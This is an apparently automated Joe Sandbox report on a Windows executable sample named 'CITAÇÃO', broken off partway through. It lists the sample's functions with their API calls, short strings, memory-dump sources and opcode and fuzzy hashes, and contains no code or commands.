                                                      Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                      • __wcsnicmp.LIBCMT ref: 00467288
                                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                      • String ID: LPT
                                                      • API String ID: 3035604524-1350329615
                                                      • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                      • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                      • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                      • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                      Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: \$h
                                                      • API String ID: 4104443479-677774858
                                                      • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                      • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                      • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                      • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                      Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID: &
                                                      • API String ID: 2931989736-1010288
                                                      • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                      • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                      • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                      • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                      Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: \
                                                      • API String ID: 4104443479-2967466578
                                                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                      Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00466825
                                                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_wcslen
                                                      • String ID: |
                                                      • API String ID: 596671847-2343686810
                                                      • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                      • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                      Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                      Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _strlen.LIBCMT ref: 0040F858
                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                      • _sprintf.LIBCMT ref: 0040F9AE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_sprintf_strlen
                                                      • String ID: %02X
                                                      • API String ID: 1921645428-436463671
                                                      • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                      • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                      • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                      • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                      Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                      • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                      • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                      • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                      Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                      • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                      • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                      • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                      Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                      • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                      • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                      • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                      Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: htonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 3832099526-2422070025
                                                      • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                      • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                      • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                      • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                      Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: InternetOpen
                                                      • String ID: <local>
                                                      • API String ID: 2038078732-4266983199
                                                      • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                      • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                      • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                      • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                      Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                      • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                      • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                      • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                      Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: u,D
                                                      • API String ID: 4104443479-3858472334
                                                      • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                      • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                      • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                      • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                      Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • wsprintfW.USER32 ref: 0045612A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend_mallocwsprintf
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 1262938277-328681919
                                                      • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                      • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                      • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                      • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                      Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetCloseHandle.WININET(?), ref: 00442663
                                                      • InternetCloseHandle.WININET ref: 00442668
                                                        • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
